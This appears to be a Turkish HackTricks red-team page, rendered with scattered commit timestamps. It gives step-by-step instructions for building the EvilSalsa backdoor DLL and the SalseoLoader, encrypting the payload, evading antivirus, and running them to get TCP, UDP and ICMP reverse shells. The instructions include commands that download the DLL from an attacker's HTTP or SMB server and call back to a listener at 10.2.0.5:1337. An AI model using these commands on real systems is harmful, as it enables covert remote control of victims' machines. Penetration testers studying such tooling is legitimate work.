2024-04-06 19:40:41 +00:00
# Salseo
< details >
2024-04-07 03:13:19 +00:00
< summary > < strong > AWS hacklemeyi sı fı rdan kahramana öğrenin< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > ile!< / strong > < / summary >
2024-04-06 19:40:41 +00:00
HackTricks'ı desteklemenin diğer yolları :
2024-05-05 22:43:52 +00:00
* **Şirketinizi HackTricks'te reklamı nı zı görmek istiyorsanı z** veya **HackTricks'i PDF olarak indirmek istiyorsanı z** [**ABONELİK PLANLARI**]'na göz atı n (https://github.com/sponsors/carlospolop)!
* [**Resmi PEASS & HackTricks ürünlerini alı n** ](https://peass.creator-spring.com )
* [**The PEASS Family**]'yi keşfedin (https://opensea.io/collection/the-peass-family), özel [**NFT'lerimiz**] koleksiyonumuz (https://opensea.io/collection/the-peass-family)
* **Katı lı n** 💬 [**Discord grubuna** ](https://discord.gg/hRep4RUj7f ) veya [**telegram grubuna** ](https://t.me/peass ) veya bizi **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**'da takip edin.**
* **Hacking püf noktaları nı zı paylaşarak PR'ler göndererek HackTricks** (https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github depoları na.
2024-04-06 19:40:41 +00:00
< / details >
## Derlemeleri Derleme
2024-05-05 22:43:52 +00:00
Kaynak kodunu github'dan indirin ve **EvilSalsa** ve **SalseoLoader** 'ı derleyin. Kodu derlemek için **Visual Studio** 'nun yüklü olması gerekecektir.
2024-04-06 19:40:41 +00:00
2024-05-05 22:43:52 +00:00
Bu projeleri, kullanacak olduğunuz Windows işletim sisteminin mimarisi için derleyin (Windows x64'ü destekliyorsa, o mimari için derleyin).
2024-04-06 19:40:41 +00:00
Mimariyi Visual Studio içinde **sol "Build" sekmesindeki** ** "Platform Target"** bölümünden **seçebilirsiniz.**
2024-05-05 22:43:52 +00:00
(\*\*Bu seçenekleri bulamazsanı z, ** "Project Tab"** üzerine tı klayı n ve ardı ndan ** "\<Project Name> Properties"**'e tı klayı n)
2024-04-06 19:40:41 +00:00
2024-05-05 22:43:52 +00:00
![](< .. / . gitbook / assets / image ( 839 ) . png > )
2024-04-06 19:40:41 +00:00
Sonra, her iki projeyi derleyin (Build -> Build Solution) (Log içinde yürütülebilir dosyanı n yolunu göreceksiniz):
2024-05-05 22:43:52 +00:00
![](< .. / . gitbook / assets / image ( 381 ) . png > )
2024-04-06 19:40:41 +00:00
## Arka Kapı yı Hazı rlama
2024-05-05 22:43:52 +00:00
Öncelikle, **EvilSalsa.dll** 'yi şifrelemeniz gerekecektir. Bunun için, **encrypterassembly.py** adlı python betiğini kullanabilir veya **EncrypterAssembly** projesini derleyebilirsiniz:
2024-04-06 19:40:41 +00:00
### **Python**
```
python EncrypterAssembly/encrypterassembly.py < FILE > < PASSWORD > < OUTPUT_FILE >
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
```
### Windows
```
EncrypterAssembly.exe < FILE > < PASSWORD > < OUTPUT_FILE >
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
```
2024-05-05 22:43:52 +00:00
Şimdi Salseo işlemini gerçekleştirmek için ihtiyacı nı z olan her şeye sahipsiniz: **şifrelenmiş EvilDalsa.dll** ve **SalseoLoader'ı n ikili dosyası .**
2024-04-06 19:40:41 +00:00
**SalseoLoader.exe ikili dosyası nı makineye yükleyin. Herhangi bir AV tarafı ndan tespit edilmemeleri gerekiyor...**
## **Arka kapı yı çalı ştı rı n**
### **TCP ters kabuk almak (şifrelenmiş dll'yi HTTP aracı lı ğı yla indirme)**
2024-05-05 22:43:52 +00:00
Ters kabuk dinleyici olarak nc'yi başlatmayı ve şifrelenmiş evilsalsa'yı sunmak için bir HTTP sunucusu başlatmayı unutmayı n.
2024-04-06 19:40:41 +00:00
```
SalseoLoader.exe password http://< Attacker-IP > /evilsalsa.dll.txt reversetcp < Attacker-IP > < Port >
```
### **Bir UDP ters kabuk almak (SMB üzerinden kodlanmı ş dll indirme)**
2024-05-05 22:43:52 +00:00
Ters kabuk dinleyici olarak nc'yi başlatmayı ve kodlanmı ş evilsalsa'yı sunmak için bir SMB sunucusu başlatmayı unutmayı n (impacket-smbserver).
2024-04-06 19:40:41 +00:00
```
SalseoLoader.exe password \\< Attacker-IP > /folder/evilsalsa.dll.txt reverseudp < Attacker-IP > < Port >
```
2024-05-05 22:43:52 +00:00
### **ICMP ters kabuk almak (şifrelenmiş dll zaten kurbanı n içinde)**
2024-04-06 19:40:41 +00:00
**Bu sefer ters kabuk almak için istemci tarafı nda özel bir araca ihtiyacı nı z var. İndirin:** [**https://github.com/inquisb/icmpsh** ](https://github.com/inquisb/icmpsh )
#### **ICMP Yanı tları nı Devre Dı şı Bı rakı n:**
```
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
```
#### Müşteriyi çalı ştı rı n:
```
python icmpsh_m.py "< Attacker-IP > " "< Victm-IP > "
```
#### Kurbanı n içinde, salseo şeyini çalı ştı ralı m:
```
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp < Attacker-IP >
```
2024-04-07 03:13:19 +00:00
## SalseoLoader'ı ana işlevi dı şa aktaran DLL olarak derleme
2024-04-06 19:40:41 +00:00
Visual Studio kullanarak SalseoLoader projesini açı n.
2024-05-05 22:43:52 +00:00
### Ana işlevin önüne ekle: \[DllExport]
2024-04-06 19:40:41 +00:00
2024-05-05 22:43:52 +00:00
![](< .. / . gitbook / assets / image ( 409 ) . png > )
2024-04-06 19:40:41 +00:00
### Bu projeye DllExport yükleyin
2024-04-07 03:13:19 +00:00
#### **Araçlar** --> **NuGet Paket Yöneticisi** --> **Çözüm İçin NuGet Paketlerini Yönet...**
2024-04-06 19:40:41 +00:00
2024-05-05 22:43:52 +00:00
![](< .. / . gitbook / assets / image ( 881 ) . png > )
2024-04-06 19:40:41 +00:00
#### **DllExport paketini arayı n (Gözat sekmesini kullanarak) ve Yükle'yi seçin (ve açı lan pencereyi kabul edin)**
2024-05-05 22:43:52 +00:00
![](< .. / . gitbook / assets / image ( 100 ) . png > )
2024-04-06 19:40:41 +00:00
2024-04-07 03:13:19 +00:00
Projeler klasörünüzde **DllExport.bat** ve **DllExport\_Configure.bat** dosyaları görünecektir.
2024-04-06 19:40:41 +00:00
### DllExport'u kaldı rı n
**Kaldı r**'ı seçin (evet, tuhaf ama bana güvenin, gerekli)
2024-05-05 22:43:52 +00:00
![](< .. / . gitbook / assets / image ( 97 ) . png > )
2024-04-06 19:40:41 +00:00
2024-04-07 03:13:19 +00:00
### Visual Studio'yu kapatı n ve DllExport\_configure'ı çalı ştı rı n
2024-04-06 19:40:41 +00:00
Sadece Visual Studio'yu **kapatı n**
2024-05-05 22:43:52 +00:00
Daha sonra, **SalseoLoader klasörüne** gidin ve **DllExport\_Configure.bat** 'ı çalı ştı rı n
2024-04-06 19:40:41 +00:00
2024-05-05 22:43:52 +00:00
**x64**'ü seçin (bir x64 kutusunda kullanacaksanı z), **System.Runtime.InteropServices** 'i seçin (**DllExport için Namespace** içinde) ve **Uygula** 'yı seçin
2024-04-06 19:40:41 +00:00
2024-05-05 22:43:52 +00:00
![](< .. / . gitbook / assets / image ( 882 ) . png > )
2024-04-06 19:40:41 +00:00
### Projeyi tekrar Visual Studio ile açı n
**\[DllExport]** artı k hata olarak işaretlenmemelidir
2024-05-05 22:43:52 +00:00
![](< .. / . gitbook / assets / image ( 670 ) . png > )
2024-04-06 19:40:41 +00:00
### Çözümü derleyin
2024-05-05 22:43:52 +00:00
**Çı kı ş Türü = Sı nı f Kütüphanesi**'ni seçin (Proje --> SalseoLoader Özellikleri --> Uygulama --> Çı kı ş türü = Sı nı f Kütüphanesi)
2024-04-06 19:40:41 +00:00
2024-05-05 22:43:52 +00:00
![](< .. / . gitbook / assets / image ( 847 ) . png > )
2024-04-06 19:40:41 +00:00
**x64 platformunu** seçin (Proje --> SalseoLoader Özellikleri --> Derleme --> Platform hedefi = x64)
2024-05-05 22:43:52 +00:00
![](< .. / . gitbook / assets / image ( 285 ) . png > )
2024-04-06 19:40:41 +00:00
2024-05-05 22:43:52 +00:00
Çözümü derlemek için: Derle --> Çözümü Derle (Çı ktı konsolunda yeni DLL'nin yolu görünecektir)
2024-04-06 19:40:41 +00:00
### Oluşturulan Dll'yi test edin
2024-04-07 03:13:19 +00:00
Dll'yi test etmek istediğiniz yere kopyalayı n ve yapı ştı rı n.
2024-04-06 19:40:41 +00:00
Çalı ştı r:
```
rundll32.exe SalseoLoader.dll,main
```
Eğer hata görünmüyorsa, muhtemelen işlevsel bir DLL'niz var!!
## DLL kullanarak bir kabuk alı n
Bir **HTTP** **sunucusu** kullanmayı ve bir **nc** **dinleyici** ayarlamayı unutmayı n
### Powershell
```
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
```
### CMD
### CMD
```
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
```
< details >
2024-04-07 03:13:19 +00:00
< summary > < strong > Sı fı rdan kahraman olmaya kadar AWS hacklemeyi öğrenin< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2024-04-06 19:40:41 +00:00
HackTricks'ı desteklemenin diğer yolları :
2024-04-07 03:13:19 +00:00
* **Şirketinizi HackTricks'te reklamı nı görmek istiyorsanı z** veya **HackTricks'i PDF olarak indirmek istiyorsanı z** [**ABONELİK PLANLARI** ](https://github.com/sponsors/carlospolop )'na göz atı n!
2024-05-05 22:43:52 +00:00
* [**Resmi PEASS & HackTricks ürünlerini alı n** ](https://peass.creator-spring.com )
* [**The PEASS Family'yi** ](https://opensea.io/collection/the-peass-family ) keşfedin, özel [**NFT'lerimiz** ](https://opensea.io/collection/the-peass-family ) koleksiyonumuz
2024-04-07 03:13:19 +00:00
* **Katı lı n** 💬 [**Discord grubuna** ](https://discord.gg/hRep4RUj7f ) veya [**telegram grubuna** ](https://t.me/peass ) veya bizi **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**'da takip edin.**
2024-05-05 22:43:52 +00:00
* **Hacking püf noktaları nı zı paylaşarak PR göndererek HackTricks** ve [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github depoları na katkı da bulunun.
2024-04-06 19:40:41 +00:00
< / details >